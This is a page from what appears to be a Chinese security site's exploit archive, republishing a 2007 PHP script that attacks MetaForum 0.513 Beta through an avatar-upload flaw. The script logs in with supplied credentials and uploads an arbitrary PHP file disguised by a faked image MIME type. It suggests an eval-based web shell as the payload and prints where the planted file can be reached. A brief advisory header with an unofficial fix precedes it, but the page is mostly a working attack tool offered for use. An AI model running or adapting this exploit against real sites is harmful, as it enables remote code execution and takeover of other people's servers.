首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MetaForum <= 0.513 Beta Remote File Upload Exploit 来源：AeroXteam.fr 作者：AeroX 发布时间：2007-03-19   <?php /*---------------------------------------------------------*\ MetaForum <= 0.513 Beta - Remote file upload Vulnerability [|Description:|] A security bug has been discovered in MetaForum 0.513 Beta. This bug can be used by an attacker to upload a malicious php file on the server. During the upload, the MIME type of the file is the only verified parameter. The extention isn't. This enables a attacker to fake the MIME type of a php file so that it is considered as an image. [|Advisory:|] http://www.aeroxteam.fr/advisory-MetaForum-0.513b.txt [|Solution:|] (unofficial) Replace line 110 in the file usercp.php by: if (($_FILES['imagefile']['type'] == "image/jpeg" || $_FILES['imagefile']['type'] == "image/pjpeg" || $_FILES['imagefile']['type'] == "image/png" || $_FILES['imagefile']['type'] == "image/gif") && in_array(strtolower(substr(strrchr($_FILES['imagefile']['name'], '.'),1)), array('gif', 'jpg', 'jpeg', 'png'))) C0d3d by Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com) for AeroX & NeoAlpha (AeroXteam.fr -- Neoalpha.fr) (C)opyleft 2007 Gr33tz: Math., Syntax ERROR, Barma, NeoMorphS, Snake91, Spamm, Kad, Nitr0, Jethro And everybody from #aerox \*---------------------------------------------------------*/ if(count($argv) == 6) { head(); echo "PHP code to write (ex: <?php eval(stripslashes(\$_GET['cmd'])); ?>) :\r\n"; $phpcode = trim(fgets(STDIN)); echo "\r\n[+] Connection... "; $sock = @fsockopen($argv[1], 80, $eno, $estr, 30); if (!$sock) { die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !"); } echo "OK\r\n"; echo "[+] Login to account... "; $reqlogin = "POST ".$argv[2]."index.php?shard=login&action=proc_login HTTP/1.1\r\n"; $reqlogin .= "Host: ".$argv[1]."\r\n"; $reqlogin .= "Accept: */*\r\n"; $reqlogin .= "Connection: Close\r\n"; $reqlogin .= "Content-Type: application/x-www-form-urlencoded\r\n"; $reqlogin .= "Content-Length: ".strlen("login_name=".$argv[3]."&login_pass=".$argv[4])."\r\n\r\n"; $reqlogin .= "login_name=".$argv[3]."&login_pass=".$argv[4]; fwrite($sock, $reqlogin); while(!feof($sock)) { $buffer = fgets($sock); if(preg_match("`Set-Cookie: ".$argv[5]."userID=(.*?);`", $buffer, $idtmp)) { $id = $idtmp[1]; } } if(empty($id)) { die("Failed\r\n\r\nCould not login as ".$argv[3]." !"); } else { echo "OK\r\n"; } fclose($sock); echo "[+] Sending of the file... "; $sock = @fsockopen($argv[1], 80, $eno, $estr, 30); if (!$sock) { die("Failed\r\n\r\nCould not connect to ".$argv[1]." on the port 80 !"); } $requp = "POST ".$argv[2]."index.php?shard=usercp&action=g_avatar HTTP/1.1\r\n"; $requp .= "Host: ".$argv[1]."\r\n"; $requp .= "Accept: */*\r\n"; $requp .= "Connection: Close\r\n"; $requp .= "Cookie: ".$argv[5]."username=".$argv[3]."; ".$argv[5]."userID=".$id."; ".$argv[5]."password=".sha1($argv[4])."\r\n"; $requp .= "Content-Type: multipart/form-data; boundary=--------------268742553814512\r\n"; $requp2 .= "----------------268742553814512\r\n"; $requp2 .= "Content-Disposition: form-data; name=\"upload_flag\";\r\n\r\n"; $requp2 .= "true\r\n"; $requp2 .= "----------------268742553814512\r\n"; $requp2 .= "Content-Disposition: form-data; name=\"imagefile\"; filename=\"owned.php\";\r\n"; $requp2 .= "Content-Type: image/jpeg\r\n\r\n"; $requp2 .= $phpcode."\r\n"; $requp2 .= "----------------268742553814512\r\n"; $requp2 .= "Content-Disposition: form-data; name=\"Submit\";\r\n\r\n"; $requp2 .= "Submit\r\n"; $requp2 .= "----------------268742553814512--\r\n"; $requp .= "Content-Length: ".strlen($requp2)."\r\n\r\n"; $requp .= $requp2; fwrite($sock, $requp); while(!feof($sock)) { if(preg_match("`<img src='images/".$argv[3].".php'`", fgets($sock))) { $ok = 1; } } if($ok == 1) { echo "OK\r\n\r\nYou can access the file at:\r\nhttp://".$argv[1].$argv[2]."images/".$argv[3].".php\r\n\r\nThank for using this exploit !"; } else { die("Failed\r\n\r\nMaybe not vulnerable ?!"); } } else { usage(); } function usage() { echo "+----------------------------------------------------------------+\r\n"; echo "|            MetaForum <= 0.513_beta Remote file upload          |\r\n"; echo "|             By Gu1ll4um3r0m41n for AeroX & NeoAlpha            |\r\n"; echo "| Usage: php exploit.php site.com /path/ user pass cookie_prefix |\r\n"; echo "+----------------------------------------------------------------+\r\n"; } function head() { echo "+----------------------------------------------+\r\n"; echo "|  MetaForum <= 0.513_beta Remote file upload  |\r\n"; echo "|   By Gu1ll4um3r0m41n for AeroX & NeoAlpha    |\r\n"; echo "+----------------------------------------------+\r\n\r\n"; } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ScriptMagix Lyrics <= 2.0 (ind ·Avant Browser <= 11.0 build 26 ·pragmaMX Module Landkarten 2.1 ·Katalog Plyt Audio (pl) <= 1.0 ·GeBlog 0.1 GLOBALS[tplname] Lo ·ScriptMagix Photo Rating <= 2. ·FTPDMIN 0.96 (LIST) Remote Den ·ScriptMagix Recipes <= 2.0 (in ·PHP <= 4.4.6 / 5.2.1 ext/gd Al ·ScriptMagix FAQ Builder <= 2.0 ·Cisco 7940 SIP INVITE remote D ·Guestbara <= 1.2 Change Admin   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved